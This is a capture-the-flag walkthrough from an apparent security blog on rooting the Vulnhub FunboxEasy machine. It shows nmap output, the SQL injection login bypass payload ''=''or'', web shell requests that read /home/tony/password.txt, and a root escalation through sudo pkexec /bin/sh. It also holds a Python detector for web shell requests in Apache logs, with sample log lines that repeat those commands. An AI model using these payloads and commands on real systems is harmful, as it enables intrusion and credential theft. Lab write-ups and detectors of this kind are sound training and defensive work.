Muzec's Cyber Security Blog

Hack. Sleep. Repeat



Boot2Root! Easy going, but with this Funbox you have to spend a bit more time. Much more if you get stuck in good traps. But most of the traps have hints that they are traps. Vulnhub link to download FunboxEasy: FunboxEasy

We always start with an nmap scan.

nmap -sC -sV -oA nmap <Target-IP>

Nmap scan report for 192.168.250.111
Host is up (0.27s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_gym
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 17 04:15:11 2020 -- 1 IP address (1 host up) scanned in 67.65 seconds

OK, let's hit the robots.txt on port 80.


robots.txt disallows /gym; let's try to access it at <Target-IP>/gym.


I spent a little time trying to get the right credentials but had no luck, so I decided to brute-force some directories with DirBuster. I think the robots.txt entry is the first rabbit hole, lol.


Another directory; let's check it out.


A Small CRM Project admin login page. Let's check for some default credentials, or maybe a known vulnerability, to get in.


Description: There is a SQL injection vulnerability in the /index.php page which allows an attacker to use the SQLi login bypass payload '=''or' for both the username and password parameters; this allows any authenticated or low-level user to log in to the admin account.


Boom, we are in, but it's just rabbit hole number 2, lol. Let's enumerate more and go back to our DirBuster results to check more directories.


The store directory looks interesting; let's hit it.


Online Book Store by projectworlds, pretty old too (2017), cool.


Let's download and try the exploit.


Boom, finally we are in.


http://192.168.250.111/store/bootstrap/img/B8Wsi38YLp.php?cmd=ls -la /home


http://192.168.250.111/store/bootstrap/img/B8Wsi38YLp.php?cmd=ls -la /home/tony


http://192.168.250.111/store/bootstrap/img/B8Wsi38YLp.php?cmd=less /home/tony/password.txt


Boom, we have the SSH password and also the username, which is tony. Let's hit SSH.
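As an added defender-side example (not part of the original write-up), here is a small Python detector that walks Apache access-log lines and flags the two tell-tale signs of the web shell used above: a .php file answering from a static image directory, and a command passed in a query parameter such as cmd. The log lines are constructed for the example and assume the default combined log format.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache combined log format: client, ident, user, [timestamp], "request", status, size.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" (?P<status>\d{3}) \S+')
# Directories that should only ever serve static assets; PHP executing from one of
# these (as B8Wsi38YLp.php does above) is a classic sign of an uploaded web shell.
STATIC_DIRS = ("/img/", "/images/", "/uploads/", "/css/", "/fonts/")
# Query parameters that one-line PHP shells commonly use to carry the command.
SHELL_PARAMS = {"cmd", "c", "exec", "command"}

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = unquote(url.path)
    rec["query"] = parse_qs(url.query, keep_blank_values=True)  # decodes %20 etc.
    return rec

def detect_webshell(line):
    """Return a finding dict for a suspicious request, or None if it looks benign."""
    rec = parse_line(line)
    if rec is None:
        return None
    path = rec["path"].lower()
    reasons = []
    if path.endswith(".php") and any(d in path for d in STATIC_DIRS):
        reasons.append("php_in_static_dir")
    cmd_params = SHELL_PARAMS & set(rec["query"])
    if cmd_params:
        reasons.append("command_parameter")
    if not reasons:
        return None
    cmd = next((rec["query"][p][0] for p in sorted(cmd_params)), None)
    return {"ip": rec["ip"], "status": rec["status"], "path": rec["path"],
            "command": cmd, "reasons": reasons}

def scan(log_text):
    return [f for f in map(detect_webshell, log_text.splitlines()) if f]
# Constructed sample lines modelled on this write-up's requests (not real logs from the box).
SAMPLE_LOG = """\
10.0.0.5 - - [17/Nov/2020:04:20:01 +0000] "GET /store/bootstrap/img/logo.png HTTP/1.1" 200 5120
10.0.0.5 - - [17/Nov/2020:04:21:14 +0000] "GET /store/bootstrap/img/B8Wsi38YLp.php?cmd=ls%20-la%20/home HTTP/1.1" 200 312
10.0.0.5 - - [17/Nov/2020:04:22:30 +0000] "GET /store/bootstrap/img/B8Wsi38YLp.php?cmd=less%20/home/tony/password.txt HTTP/1.1" 200 88
10.0.0.5 - - [17/Nov/2020:04:23:00 +0000] "GET /store/index.php?page=books HTTP/1.1" 200 2048
10.0.0.9 - - [17/Nov/2020:04:24:00 +0000] "GET /store/bootstrap/img/old.php HTTP/1.1" 404 200
"""
```

Run `scan(SAMPLE_LOG)` to see the three hits: the two command executions and the 404 probe for another .php file in the image directory, which is worth alerting on even though it failed.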


We are in over SSH. First things first, let's check our sudo rights with sudo -l.


Plenty of ways to get root, but let's go with /usr/bin/pkexec. Let's check GTFOBins.


Now let's run sudo pkexec /bin/sh.


We are root. Box rooted.

Greetings from Muzec
